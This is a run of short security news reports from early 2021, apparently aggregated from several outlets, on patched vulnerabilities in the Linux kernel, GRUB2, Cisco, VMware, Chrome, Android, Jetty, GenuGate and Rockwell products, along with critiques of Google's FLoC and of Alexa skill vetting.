Cybersecurity firm Volexity, which was credited by Microsoft for reporting different parts of the attack chain, has published a blog post with technical details and a video demonstrating exploitation in action, along with known attacker IP addresses connected to the attacks. Volexity said it detected anomalous activity from two of its customers’ Microsoft Exchange servers in January 2021, which led to discovery of the attacks.
"This is an active threat," White House press secretary Jennifer Psaki said in a press briefing Friday. "Everyone running these servers needs to act now to patch them. We are concerned that there are a large number of victims and are working with our partners to understand the scope of this."
Critics Blast Google’s Aim to Replace Browser Cookie with ‘FLoC’
6.3.2021
Vulnerebility
Threatpost
EFF worries that the Google’s ‘privacy-first” vision for the future may pose new privacy risks.
This month Google begins a public test of a technology it says will eventually replace browser cookies in an effort to boost Chrome browser user privacy. However, critics say the switch is a half-measure and does not protect the web movements of Chrome users adequately.
The Google solution–called Federated Learning of Cohorts (FLoC)—is promoted as a way to put people’s privacy first by limiting the capability of third parties to track their activity across the web using Cookies.
How Does Federated Learning of Cohorts Protect Privacy?
The as-yet unproven
technology allows browsers to group people together by their interests and give
them more anonymity yet still allow for appropriate targeted advertising, which
remains at the core of the company’s interest in outfitting their Chrome browser
with FLoC. Google’s stance is that it will balance the need to preserve people’s
privacy by preventing individual tracking with giving advertisers and publishers
the relevant info they need to recognize their target audience.
However, FLoC also raises new questions of who should have the ultimate power when it comes to accessing private information about people’s online browsing habits, which privacy advocates think should ultimately be a far more egalitarian affair. The digital privacy group the Electronic Frontier Foundation (EFF) has even gone so far as to call FLoC a “terrible idea” in a blog post published Wednesday by staff technologist Benett Cyphers.
Why EFF is Critical of FLoC
Others worry that FLoC is just Google attempting
to dress up what ostensibly is at its core another, albeit potentially less
obtrusive way to track people’s behavior to suit its targeted advertising agenda
to ensure the company will continue to drive the market.
“Google has announced that its tests show promising signs that FLoC is working,” wrote Malwarebytes Labs security research Pieter Artnz in a blog post published in January. “Is this a milestone on the road to more privacy, or just better concealed tracking technology?”
That’s the central question that will become even relevant than ever now that FloC is reaching a broader audience, given Google Chrome’s strong position in the browser market and the company’s broad influence in the tech sector in general.
How FLoC Delivers a ‘Privacy First’ Experience
Google, naturally, is leading
with its concern for privacy in its messaging and promotion of FloC, stressing
the technology is a community effort that aims to include and balance the
interests of everyone using the web, either for profit or not.
The company last year announced its intent to remove support for third-party cookies and work on a better solution via a two-year plan that included a Privacy Sandbox—or collaboration and partnership on the mission with industry leaders, publishers and marketers–that would both “protect anonymity while still delivering results for advertisers and publishers,” David Temkin Google’s director of product management, ads privacy and trust wrote in a blog post published Wednesday.
“Even so, we continue to get questions about whether Google will join others in the ad tech industry who plan to replace third-party cookies with alternative user-level identifiers,” he wrote. “Today, we’re making explicit that once third-party cookies are phased out, we will not build alternate identifiers to track individuals as they browse across the web, nor will we use them in our products.”
FLoC’s latest tests show effectiveness of hiding individual browsing behavior that cookies highlighted “within large crowds of people with common interests,” which are called “cohorts.” Temkin wrote.
Within Chrome, the company will make FLoC-based cohorts available for public testing through origin trials with the technology’s next release this month, then begin testing FLoC-based cohorts with advertisers in Google Ads in the second quarter. Chrome also will offer the first iteration of new user controls in April, expanding them after more proposals and feedback from the broader industry, he said.
“This points to a future where there is no need to sacrifice relevant advertising and monetization in order to deliver a private and secure experience,” Temkin wrote.
Potential for New Privacy Risks with FLoC
But not everyone is as enthusiastic
about FLoC’s potential to take tracking out of browsers. The EFF’s Cyphers
argued that by eliminating one way of tracking user activity, it’s introducing
other, potentially more intrusive ways for third parties to observe what people
are doing online.
“The core design involves sharing new information with advertisers,” he wrote. “Unsurprisingly, this also creates new privacy risks.”
Cyphers cited fingerprinting, or the practice of gathering many discrete pieces of information from a user’s browser to create a unique, stable identifier for that browser, as one emerging privacy threat.
While Google has promised that the vast majority of FLoC cohorts will comprise thousands of users each, so a cohort ID alone shouldn’t distinguish someone from others in their group, it “still gives fingerprinters a massive head start” that “will make it much easier for trackers to put together a unique fingerprint for FLoC users,” Cyphers wrote.
FLoC also will share new personal data with advertisers and marketers revealing information about their behavior, such as specific information about browsing history and general information about demographics or interests. This means “every site you visit will have a good idea about what kind of person you are on first contact, without having to do the work of tracking you across the web,” he wrote.
Moreover, technology like FLoC raises the question of whether behavior targeting is actually a good idea in the first place and if it should continue, calling the end of the cookie a “fork in the road” with two possible future scenarios ahead.
“In one, users get to decide what information to share with each site they choose to interact with,” Cyphers wrote. “No one needs to worry that their past browsing will be held against them—or leveraged to manipulate them—when they next open a tab.”
In the other, which he argued that FLoC will continue to promote, people’s online behavior follows them across the web “as a label,” appearing innocent at a glance but highly valuable to those with the knowledge and intent to use it—or potentially abuse it–for their own interests.
Five privilege escalation flaws fixed in Linux Kernel
6.3.2021
Vulnerebility
Securityaffairs
Experts found five vulnerabilities in the Linux kernel, tracked as
CVE-2021-26708, that could lead to local privilege escalation.
Positive
Technologies researcher Alexander Popov found five high severity vulnerabilities
in the Linux kernel that could lead to local privilege escalation.
The Linux
kernel vulnerabilities are race conditions that reside in AF_VSOCK
implementation, they were implicitly introduced in November 2019 in the commits
c0cfa2d8a788fcf4 and 6a2c0962105ae8ce that added VSOCK multi-transport support.
A race condition is the condition of an electronics, software, or other system where the system’s substantive behavior is dependent on the sequence or timing of other uncontrollable events. It becomes a bug when one or more of the possible behaviors is undesirable.
The race conditions stems in wrong locking in net/vmw_vsock/af_vsock.c.
“CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are shipped as kernel modules in all major GNU/Linux distributions. The vulnerable modules are automatically loaded when you create a socket for AF_VSOCK. That is available for unprivileged users and user namespaces are not needed for that. These vulnerabilities are race conditions caused by wrong locking in net/vmw_vsock/af_vsock.c.” wrote Popov. “The race conditions were implicitly introduced in November 2019 in the commits c0cfa2d8a788fcf4 and 6a2c0962105ae8ce that added VSOCK multi-transport support. These commits were merged in the Linux kernel v5.5-rc1.”
The issues, collectively tracked as CVE-2021-26708, were introduced in kernel version 5.5 in November 2019, they received a CVSS score of 7.0,
The expert successfully developed a PoC exploit for local privilege escalation on Fedora 33 Server, it could allow bypassing x86_64 platform protections such as SMEP and SMAP.
The patch has been merged into mainline kernel version 5.11-rc7 and backported into affected stable trees.
Popov discovered other Linux kernel flaws in the past, including CVE-2019-18683 and CVE-2017-2636 vulnerabilities.
Privilege Escalation Bugs Patched in Linux Kernel
6.3.2021
Vulnerebility
Securityweek
A total of five vulnerabilities that could lead to local privilege escalation were recently identified and fixed in the Linux kernel.
Identified by Positive Technologies security researcher Alexander Popov, the high severity bugs resided in the virtual socket implementation of the Linux kernel.
Tracked as CVE-2021-26708 and featuring a CVSS score of 7.0, the security holes were introduced in Linux kernel version 5.5 in November 2019.
The vulnerabilities are the result of race conditions that were added with virtual socket (VSOCK) multi-transport support, with all major GNU/Linux distributions impacted, as the vulnerable kernel drivers (CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS) are shipped to all of them, as kernel modules.
Upon the creation of an AF_VSOCK socket, the vulnerable modules are automatically loaded, Positive Technologies explains. The bugs can be abused by unprivileged users.
The issues, Popov says, are race conditions rooted in wrong locking in net/vmw_vsock/af_vsock.c.
The bug exists because the vsock_sock.transport pointer is copied to a local variable that is used after lock_sock() is called. However, the vsock_sock.transport value may change before lock_sock() is called, thus causing the race condition.
The suggested fix involves copying the vsock_sock.transport pointer to the local value after lock_sock() has been called.
"I successfully developed a prototype exploit for local privilege escalation on Fedora 33 Server, bypassing x86_64 platform protections such as SMEP and SMAP. This research will lead to new ideas on how to improve Linux kernel security," Popov commented.
In addition to identifying the vulnerabilities, the security researcher prepared a patch and sent it to the Linux kernel security team. The fix was merged into mainline kernel version 5.11-rc7 and also got backported into affected stable trees.
Several Cisco Products Exposed to DoS Attacks Due to Snort Vulnerability
6.3.2021
Vulnerebility
Securityweek
Cisco informed customers on Wednesday that several of its products are exposed to denial-of-service (DoS) attacks due to a vulnerability in the Snort detection engine.
The flaw, tracked as CVE-2021-1285 and rated high severity, can be exploited by an unauthenticated, adjacent attacker — the attacker is on the same layer 2 domain as the victim — to cause a device to enter a DoS condition by sending it specially crafted Ethernet frames.
Cisco says the vulnerability is in the Ethernet Frame Decoder component of Snort. The issue impacts all versions of the popular open source intrusion prevention and intrusion detection system (IPS/IDS) prior to 2.9.17, which contains a patch.
CVE-2021-1285 has been found to impact Integrated Service Router (ISR), Catalyst Edge software and platform, and 1000v series Cloud Services Router products. These devices are affected if they are running a vulnerable version of Cisco UTD Snort IPS engine software for IOS XE or Cisco UTD Engine for IOS XE SD-WAN, and they are configured to pass Ethernet frames to Snort.
Cisco says the vulnerability is related to a Firepower Threat Defense (FTD) issue patched in October 2020.
The vulnerability was found during the resolution of a support case and there is no evidence that it has been exploited in malicious attacks.
Cisco on Wednesday also published advisories for a dozen other vulnerabilities, which have been assigned a medium severity rating. These impact Webex, SD-WAN, ASR, Network Services Orchestrator, IP phones, and Email Security Appliance products, and they can lead to information disclosure, path traversal, authorization bypass, DoS attacks, privilege escalation, and SQL injection.
VMware addresses Remote Code Execution issue in View Planner
5.3.2021
Vulnerebility
Securityaffairs
VMware released a security patch for a remote code execution vulnerability that
affects the VMware View Planner product.
VMware released a security patch for
a remote code execution flaw, tracked as CVE-2021-21978, that affects the VMware
View Planner.
The View Planner is a free tool for Performance Sizing and Benchmarking of Virtual Desktop Infrastructure environments.
The vulnerability was reported Positive Technologies researcher Mikhail
Klyuchnikov.
The company fixed the CVE-2021-21978 vulnerability with the
release of version 4.6 Security Patch 1 on March 2. The vulnerability received a
CVSS score of 8.6.
“A vulnerability in VMware View Planner was privately reported to VMware. An update is available to remediate this vulnerability in affected VMware products.” reads te advisory published by the company. “Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container.”
The issue is caused by the improper input validation and the lack of authorization that could allow an attacker to upload specially crafted files in logupload web application. The vulnerability could be exploited only by an attacker with network access.
VMware recommends installing the security patch, but it not known if the flaw has been exploited in attacks in the wild.
GRUB2 boot loader maintainers fixed hundreds of flaws
5.3.2021
Vulnerebility
Securityaffairs
Now maintainers at the GRUB project have released security updates to address
more than 100 vulnerabilities.
GRUB2 (the GRand Unified Bootloader version 2)
is a replacement for the original GRUB Legacy boot loader, which is now referred
to as “GRUB Legacy”. The mechanism is designed to protect the boot process from
attacks.
In July 2020, researchers at the cybersecurity firmware Eclypsium disclosed a buffer overflow vulnerability, tracked as CVE-2020-10713 and dubbed BootHole, which can be exploited by attackers to install persistent and stealthy malware.
Now maintainers at the GRUB project have released security updates to address more than 100 vulnerabilities.
“The BootHole vulnerability [announced last year encouraged many people to take a closer look at the security of boot process in general and the GRUB bootloader in particular. Due to that, during past few months we were getting reports of, and also discovering various security flaws in the GRUB ourselves.” wrote GRUB maintainer Daniel Kiper on GRUB’s mailing list. “You can find the list of most severe ones which got CVEs assigned at the end of this message. The patch bundle fixing all these issues in the upstream GRUB contains 117 patches.”
The GRUB project maintainers released a total of 117 upstream code patches for the above flaws.
Below the list of GRUB2 vulnerabilities shared in the newsletter:
CVE-2020-14372 grub2: The acpi command allows privileged user to load crafted
ACPI tables when Secure Boot is enabled CWE-184 (CVSS 7.5) – Reported by Máté
Kukri.
CVE-2020-25632 grub2: Use-after-free in rmmod command CWE-416 (CVSS
7.5) – Reported by Chris Coulson (Canonical).
CVE-2020-25647 grub2:
Out-of-bound write in grub_usb_device_initialize() CWE-787 (CVSS 6.9). –
Reported-by: Joseph Tartaro (IOActive) and Ilja van Sprundel (IOActive).
CVE-2020-27749 grub2: Stack buffer overflow in grub_parser_split_cmdline
CWE-121(CVSS 7.5) – Reported-by: Chris Coulson (Canonical).
CVE-2020-27779
grub2: The cutmem command allows privileged user to remove memory regions when
Secure Boot is enabled CWE-285 (CVSS 7.5) – Reported-by: Teddy Reed.
CVE-2021-3418 – grub2: GRUB 2.05 reintroduced CVE-2020-15705 CWE-281 (CVSS 6.4)
– Reported-by: Dimitri John Ledkov (Canonical).
CVE-2021-20225 grub2: Heap
out-of-bounds write in short form option parser CWE-787 (CVSS 7.5) –
Reported-by: Daniel Axtens (IBM).
CVE-2021-20233 grub2: Heap out-of-bound
write due to mis-calculation of space required for quoting. (CVSS 7.5) –
Reported-by: Daniel Axtens (IBM)
“In addition, we have been working on a
generation number based revocation scheme termed UEFI Secure Boot Advanced
Targeting (SBAT) [3]. This will require an UEFI dbx release and resigning all
the artifacts — shim, GRUB, kernel, etc. — needed to boot the system. This is
the same as we did for the BootHole series of vulnerabilities, but the SBAT work
is designed to make this process much less painful in the future.” Kiper added.
“Details of exactly what needs updating will be provided by the respective
distros and vendors when updates become available. Here [4] we are listing at
least some links to the messaging known at the time of this posting.”
Major Linux distros, including Debian, RedHat, and Ubuntu, released security advisories for the above vulnerabilities.
“Details of exactly what needs updating will be provided by the respective distros and vendors when updates become available.” concluded Kiper.
“Full mitigation against all the CVEs will require an updated UEFI revocation list (dbx) which, in at least some cases, will not allow Secure Boot with today’s boot artifacts.”
Intel Paid Out $800,000 Per Year Through Bug Bounty Program
4.3.2021
Vulnerebility
Securityweek
Over 230 Vulnerabilities Patched in Intel Products in 2020
Intel patched 231 vulnerabilities in its products last year, roughly the same as in the previous year, when it fixed 236 flaws.
The chipmaker on Wednesday published its 2020 Product Security Report, which reveals that nearly half of the vulnerabilities patched last year were discovered by its own employees, and the company claims that a vast majority of the addressed issues are the direct result of its investment in product security assurance.
According to Intel, 105 vulnerabilities were reported through the company’s bug bounty program, which saw a 33% increase in submissions compared to the previous year. The company also reported seeing a significant increase in the number of external security researchers it engaged with.
Intel said it paid out an average of $800,000 per year through its bug bounty program since it was launched in 2018.
The report shows that 93 vulnerabilities were found in software, 66 in firmware, and 58 required both firmware and software updates to patch. Fourteen flaws were found to affect hardware.
In terms of severity, only 3% of the security holes patched last year were rated critical. Roughly one-third were rated high severity, and 57% were assigned a medium severity rating.
“The impact of most of the medium, high, and critical vulnerabilities is potential elevation of privilege,” Intel explained in its report. “In the case of medium severity issues, these require an authenticated user on the same physical network or who has physical access to a vulnerable system. These issues become high or critical, if an unauthenticated user can trigger the vulnerability and/or they can reach a vulnerable system from outside the local area network.”
Jetty Flaw Can Be Exploited to Inflate Target's Cloud Bill, Cause Disruption
4.3.2021
Vulnerebility
Securityweek
A vulnerability affecting Eclipse Jetty web servers can be exploited by an attacker to inflate a targeted organization’s cloud services bill or cause disruption, according to security researchers at tech company Synopsys.
Jetty is an open source Java web server and servlet container that has been used in a wide range of projects and products, including by major companies such as Facebook, Google and Yahoo.
Synopsys researchers discovered that Jetty versions 9.4.6 through 9.4.36, 10.0.0 and 11.0.0 are affected by a denial-of-service (DoS) vulnerability.
The issue was reported to Jetty developers on February 10 and it was patched a couple of weeks later in all impacted versions.
“When Jetty handles a request containing request headers with a large number of ‘quality’ (i.e. q) parameters (such as what are seen on the Accept, Accept-Encoding, and Accept-Language request headers), the server may enter a denial of service (DoS) state due to high CPU usage while sorting the list of values based on their quality values. A single request can easily consume minutes of CPU time before it is even dispatched to the application,” reads an advisory published by Jetty developers.
Travis Biehn, principal security consultant at Synopsys, told SecurityWeek that an attacker could exploit this vulnerability to “run up an organization’s bill or degrade service for other users.”
“Consider an organization that has some sort of auto-scaling Amazon infrastructure. For instance, overloading one server causes another to be provisioned and an attacker can run up a customers’ bill by leveraging this attack,” Biehn explained.
“The nuts and bolts of executing the attack are that the attacker just needs to be able to get HTTP requests to a vulnerable Jetty server with a malicious Accept header. No authentication is required,” he added. “It’s not typical to see Jetty serving the edge directly, so it’s possible that components like load balancers might make exploitation more difficult.”
VMware Patches Remote Code Execution Vulnerability in View Planner
4.3.2021
Vulnerebility
Securityweek
VMware this week announced the availability of a security patch for VMware View Planner, to address a vulnerability leading to remote code execution.
The benchmarking tool provides consistent methodology for the comparison of virtual desktop deployment platforms, measuring both the performance of application operations and the scalability of the deployment platform.
With the release of View Planner 4.6 Security Patch 1 on March 2, VMware fixes CVE-2021-21978, an issue that could allow an attacker to execute code remotely. The bug features a CVSS score of 8.6.
In its advisory, VMware explains that the bug is, in fact, rooted in improper input validation, complemented by lack of authorization.
Together, these issues could be abused for the upload of arbitrary files in the logupload web application, which could then lead to code execution.
According to the company, an attacker looking to exploit this bug needs to have already compromised the network in order to access View Planner Harness.
The attacker could then abuse the vulnerability to upload a specially crafted file and then execute it, which would essentially result in the execution of code remotely, within the logupload container.
The company also notes that it considers the vulnerability “to be in the Important severity range,” and that the bug was privately reported.
VMware recommends that all affected customers apply the security patch that was released this week, to ensure they are protected.
The issue was reported by Mikhail Klyuchnikov, a researcher with Positive Technologies. VMware makes no mention of the vulnerability being exploited in the wild.
Google fixes Critical Remote Code Execution issue in Android System component
3.3.2021
Vulnerebility
Securityaffairs
Google addressed 37 vulnerabilities with the release of the Android security
updates for March 2021, including a critical flaw in the System component.
Google released security updates to address 37 vulnerabilities as part of the
Android security updates for March 2021, the most severe one is a critical flaw
in the System component tracked as CVE-2021-0397.
Google addressed the flaw as part of the 2021-03-01 security patch level.
The CVE-2021-0397 vulnerability is a remote code execution issue and that affects Android 8.1, 9, 10, and 11 releases.
“The most severe of these issues is a critical security vulnerability in the System component that could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process,” reads the advisory published by Google.
The tech giant also fixed a total of 27 other security flaws as part of the 2021-03-05 security patch level, including one in Kernel components, four in Qualcomm components, and 22 in Qualcomm closed-source components.
5 out of 27 issues were rated as critical (CVE-2020-11192, CVE-2020-11204, CVE-2020-11218, CVE-2020-11227, CVE-2020-11228) and affect Qualcomm closed-source components.
Google’s March 2021 Android Security Bulletin also includes the fix for the CVE-2021-0390 flaw in Project Mainline components, which affects Wi-Fi.
Why does this bulletin have two security patch levels?
“Devices that use the 2021-03-01 security patch level must include all issues
associated with that security patch level, as well as fixes for all issues
reported in previous security bulletins.
Devices that use the security patch
level of 2021-03-05 or newer must include all applicable patches in this (and
previous) security bulletins.
Partners are encouraged to bundle the fixes for
all issues they are addressing in a single update.
New Chrome 0-day Bug Under Active Attacks – Update Your Browser ASAP!
3.3.2021
Vulnerebility
Thehackernews
Exactly a month after patching an actively exploited zero-day flaw in Chrome, Google today rolled out fixes for yet another zero-day vulnerability in the world's most popular web browser that it says is being abused in the wild.
Chrome 89.0.4389.72, released by the search giant for Windows, Mac, and Linux on Tuesday, comes with a total of 47 security fixes, the most severe of which concerns an "object lifecycle issue in audio."
Tracked as CVE-2021-21166, the security flaw is one of the two security bugs reported last month by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. A separate object lifecycle flaw, also identified in the audio component, was reported to Google on February 4, the same day the stable version of Chrome 88 became available.
With no additional details, it's not immediately clear if the two security
shortcomings are related.
Google acknowledged that an exploit for the vulnerability exists in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes and prevent other threat actors from creating exploits targeting this zero-day.
"Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild," Chrome Technical Program Manager Prudhvikumar Bommana said.
This is the second zero-day flaw addressed by Google in Chrome since the start of the year.
On February 4, the company issued a fix for an actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.
Additionally, Google last year resolved five Chrome zero-days that were actively exploited in the wild in a span of one month between October 20 and November 12.
Chrome users can update to Chrome 89 by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.
Firewall Vendor Patches Critical Auth Bypass Flaw
2.3.2021 Vulnerebility Threatpost
Genua firewall security vulnerability
Cybersecurity firm Genua fixes a
critical flaw in its GenuGate High Resistance Firewall, allowing attackers to
log in as root users.
Germany-based cybersecurity company Genua has fast-tracked a fix for a critical flaw in one of its firewall products. If exploited, the vulnerability could allow local attackers to bypass authentication measures and log in to internal company networks with the highest level of privileges.
Genua says it offers more than 20 security solutions for encrypting data communication via the internet, remotely maintaining systems, securely accessing remote data and more – used by anything from critical infrastructure companies to German federal agencies. Affected by the critical flaws is the GenuGate High Resistance Firewall, which Genua touts as a two-tier firewall that includes an application-level gateway and a packet filter for blocking malicious data.
“An unauthenticated attacker is able to successfully login as arbitrary user in the admin web interface, the side channel interface and user web interface, even as root with highest privileges, by manipulating certain HTTP POST parameters during login,” according to security and application consultation company SEC Consult on Monday.
Genua GenuGate High Resistance Firewall
Genua says that the GenuGate High
Resistance Firewall blocks internal networks against unauthorized access, and
structures an intranet to establish various domains with different protection
measures.
According to Genua, GenuGate is classified as “NATO Restricted.” NATO is a security classification for restricted information from the North Atlantic Treaty Organization. It requires that certain products contain safeguards and protection from public release and disclosure. According to Genua:
“The High Resistance Firewall genugate satisfies the highest requirements: two different firewall systems – an application level gateway and a packet filter, each on separate hardware – are combined to form a compact solution. genugate is approved for classification levels German and NATO RESTRICTED and RESTREINT UE/EU RESTRICTED. genugate is certified according to CC EAL 4+”
The vulnerable versions of the firewall include GenuGate versions below 10.1 p4; below 9.6 p7 and versions 9.0 and below Z p19. The flaw has been fixed in GenuGate versions 10.1 p4 (G1010_004); 9.6 p7 (G960_007); 9.0 and 9.0 Z p19 (G900_019).
“The vendor provides a patched version for the affected products which should be installed immediately,” according to SEC Consult. “Customers should also adhere to security best practices such as network segmentation and limiting access to the admin panel. This is also a requirement for certified and approved environments.”
Critical GenuGate Firewall Cybersecurity Flaw
The critical authentication
bypass vulnerability (CVE-2021-27215) stems from the GenuGate’s various admin
authentication methods. The admin web interface, sidechannel web and userweb
interface, use different methods to authenticate users.
But during the login process, certain HTTP POST parameters are passed to the server, which does not check the provided data, and allows for any authentication request.
By manipulating a specific parameter method, an attacker is able would be able bypass the authentication easily and login as arbitrary user. That could include logging in as a root user with the highest privileges (or even a non-existing user), said SEC Consult researchers.
Researchers with SEC Consult published a high-level proof-of-concept (PoC)
exploit, including a video (see below). However, researchers abstained from
publishing specific PoC details due to the critical nature of the bug.
There is one caveat. In order to exploit the vulnerability, an attacker would first need to have network access to the admin interface.
“Certified and approved environments mandate that the admin interface is only reachable through a strictly separated network,” according to SEC Consult. “Nevertheless, it is a highly critical security vulnerability and must be patched immediately.”
Cybersecurity Firewall Vulnerabilities and Remediation
Researchers contacted
Genua on Jan. 29 regarding the vulnerability. That same day, Genua confirmed the
issue and began working on a patch – and released a patch for the affected
product on Feb. 2. The public disclosure of the vulnerability (in coordination
with CERT-Bund and CERT) was published, Monday. SEC Consult said, the patch can
be downloaded in GenuGate GUI or by calling “getpatches” on the command line
interface.
Firewall vulnerabilities provide a dangerous route for attackers to infiltrate sensitive company networks.
In January, security experts warned hackers are ramping up attempts to exploit a high-severity vulnerability that may still reside in over 100,000 Zyxel Communications products, which are generally utilized by small businesses as firewalls and VPN gateways. In April, attackers started targeting the Sophos XG Firewall (both physical and virtual versions) using a zero-day exploit, with the ultimate goal of dropping the Asnarok malware on vulnerable appliances.
Genua has not responded to a request for comment.
Amazon Dismisses Claims Alexa ‘Skills’ Can Bypass Security Vetting Process
27.2.2021
Vulnerebility
Threatpost
Researchers found a number of privacy and security issues in Amazon’s Alexa skill vetting process, which could lead to attackers stealing data or launching phishing attacks.
Researchers warn Amazon’s voice assistant Alexa is vulnerable to malicious third-party “skills” – voice assistant capabilities developed by third parties – that could leave smart-speaker owners vulnerable to a wide range of cyberattacks.
The security-threat claim is roundly dismissed by Amazon.
Researchers scrutinized 90,194 unique skills from Amazon’s skill stores across seven countries. The report, presented at the Network and Distributed System Security Symposium 2021 this week, found widespread security issues that could lead to phishing attacks or the ability to trick Alexa users into revealing sensitive information.
“While skills expand Alexa’s capabilities and functionalities, it also creates new security and privacy risks,” said a group of researchers from North Carolina State University, the Ruhr-University Bochum and Google, in a research paper (PDF).
“We identify several gaps in the current ecosystem that can be exploited by an adversary to launch further attacks, including registration of arbitrary developer name, bypassing of permission APIs, and making backend code changes after approval to trigger dormant intents,” they said.
An Amazon spokesperson told Threatpost that the company conducts security reviews as part of skill certification, and has systems in place to continually monitor live skills for potentially malicious behavior.
“The security of our devices and services is a top priority,” said the Amazon spokesperson. “Any offending skills we identify are blocked during certification or quickly deactivated. We are constantly improving these mechanisms to further protect our customers. We appreciate the work of independent researchers who help bring potential issues to our attention.”
What is an Amazon Alexa Skill?
A skill is essentially an application for
Alexa, made by third-party developers, which can be installed or uninstalled by
users on their corresponding Alexa smartphone app. These skills have a variety
of functionalities – from reading stories to children, to interacting with
services like Spotify.
For developers to build a skill, they need the following elements:
An invocation name identifying the skill
A set of “intents,” which are the
actions Alexa users must take to invoke the skill
Specific words or phrases
that users can utilize to invoke the desired intents
A cloud-based service to
accept requests and consequently act on them
A configuration that brings the
intents, invocation names and cloud-based service together, so Alexa can route
the correct requests to the desired skill
Finally, before the skills can be
actively made public to Alexa users, developers must submit their skills to be
vetted and verified by Amazon. During this vetting process, Amazon ensures that
the skills meet their policy guidelines.
For instance, Amazon makes sure that the privacy policy link for the skill is valid, and that the skill meets the security requirements needed for hosting services on external servers (by checking whether the server responds to requests that aren’t signed by an Amazon-approved certificate authority, for instance).
Amazon’s Alexa Skill Vetting is Lacking
However, researchers said they found
several glaring issues with Amazon’s skill vetting process. For one, developers
can get away with registering skills that use some (but not others) well-known
company names – such as Ring, Withings or Samsung. Bad actors could then
leverage these fake skill brand names by sending phishing emails to users that
link to the skill’s Amazon store webpage – ultimately adding an air of
legitimacy to the phishing message and tricking users into handing over valuable
information.
Credit: Researchers with North Carolina State University, the Ruhr-University
Bochum and Google
Researchers said they found 9,948 skills in the U.S. skill store, for instance, that shared the same invocation name with at least one other skill – and across all skill stores, they found that only 36,055 (out of the 90,194) skills had a unique invocation name.
“This primarily happens because Amazon currently does not employ any automated approach to detect infringements for the use of third-party trademarks, and depends on manual vetting to catch such malevolent attempts which are prone to human error,” said researchers.
Another issue highlighted by researchers is that attackers can make code changes after their skills have been approved by Amazon, opening the door for various malicious intents. The issue here stems from the ability for developers to register various intents during the certificate process.
“Thus, an attacker can register dormant intents which are never triggered during the certification process to evade being flagged as suspicious,” said researchers. “However, after the certification process the attacker can change the backend code (e.g., change the dialogue to request for a specific information) to trigger dormant intents.”
In a real-world scenario, this could open the door for attackers to make code changes that could convince a user into revealing sensitive information – such as bank account details or otherwise.
Issues With Alexa Privacy Policy Model
Researchers said that this requesting
of sensitive information points to a larger overarching, conceptual (rather than
technical implementation) issue.
Alexa skills can be configured to request permissions from users to access personal information from the Alexa account – such as the user’s address or contact information. However, researchers said that they uncovered instances where skills bypass the permission APIs and directly request such information from end users.
Credit: Researchers with North Carolina State University, the Ruhr-University
Bochum and Google
Some skills, for instance, included the name of a user’s specific locations as part of the invocation phrase. Researchers pointed to local news provider “Patch,” which created 775 skills that include a city name. Such skills can potentially be used to track one’s whereabouts, they argued.
“One could argue that this is not an issue as users explicitly provide their information, however, there may be a disconnect between how developers and users perceive the permission model,” said researchers. “A user may not understand the difference between providing sensitive data through the permission APIs versus entering them verbally.”
In another privacy issue, researchers found that 23.3 percent of the privacy policies viewed for skills were not fully disclosing the data types that were associated with permissions requested by a skill. For instance, 33 percent of skills accessing a user’s full name did not disclose that type of data collection in their privacy policy.
Amazon Alexa: Previous Skills Hacks
Alexa skills have come under scrutiny in
the past, starting in 2018 when researchers created a proof-of-concept “rogue
skill” that could eavesdrop on Alexa users – and automatically transcribe every
word said.
In 2019, researchers said that vulnerabilities stemming from skills could enable what they called a “Smart Spies” hack, which allows for eavesdropping, voice-phishing, or using people’s voice cues to determine passwords.
Amazon, for its part, in 2019 did make a few modifications to make this “Smart Spies” hack more difficult – However, researchers called the mitigations are “comically ineffective,” saying that Amazon (and other voice assistant makers, such as Google) need to focus on weeding out malicious skills from the getgo, rather than after they are already live.
Finally, as recently as August, researchers disclosed flaws in Alexa that could allow attackers to access personal data and install skills on Echo devices.
“Our analysis shows that while Amazon restricts access to user data for skills and has put forth a number of rules, there is still room for malicious actors to exploit or circumvent some of these rules,” said researchers this week. “This can enable an attacker to exploit the trust they have built with the system.”
Unprotected Private Key Allows Remote Hacking of Rockwell Controllers
27.2.2021
Vulnerebility
Securityweek
Industrial organizations have been warned this week that a critical authentication bypass vulnerability can allow hackers to remotely compromise programmable logic controllers (PLCs) made by industrial automation giant Rockwell Automation.
The vulnerability, tracked as CVE-2021-22681 with a CVSS score of 10, was independently reported to Rockwell by researchers at the Soonchunhyang University in South Korea, Kaspersky, and industrial cybersecurity firm Claroty.
Advisories for this flaw were published this week by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Rockwell (account required). Claroty has also released a blog post with a high-level description of its findings.
The vulnerability impacts Studio 5000 Logix Designer (formerly RSLogix 5000), the popular design and configuration software for PLCs, as well as over a dozen CompactLogix, ControlLogix, DriveLogix, Compact GuardLogix, GuardLogix, and SoftLogix controllers.
The problem is related to the Logix Designer software using a private cryptographic key to verify communications with controllers. This key is not sufficiently protected, allowing a remote, unauthenticated attacker to bypass the verification mechanism and connect to the controller by mimicking an engineering workstation.
Once they have connected to the PLC, an attacker on the targeted organization’s network — or malware — can upload malicious code to the controller, download information from the device, or install new firmware. Claroty pointed out that exploitation of the vulnerability could directly impact a manufacturing process.
Claroty said it reported the issue to Rockwell back in 2019. It’s unclear when the others informed the vendor about the vulnerability.
Rockwell has advised customers to implement mitigations to reduce the risk of exploitation, including putting controllers into “Run mode,” deploying CIP Security to prevent unauthorized connections, and updating the controller firmware. It has also shared information for detecting potentially malicious changes and making general security improvements.
Cisco Releases Security Patches for Critical Flaws Affecting its Products
27.2.2021
Vulnerebility
Thehackernews
Cisco has addressed a maximum severity vulnerability in its Application Centric Infrastructure (ACI) Multi-Site Orchestrator (MSO) that could allow an unauthenticated, remote attacker to bypass authentication on vulnerable devices.
"An attacker could exploit this vulnerability by sending a crafted request to the affected API," the company said in an advisory published yesterday. "A successful exploit could allow the attacker to receive a token with administrator-level privileges that could be used to authenticate to the API on affected MSO and managed Cisco Application Policy Infrastructure Controller (APIC) devices."
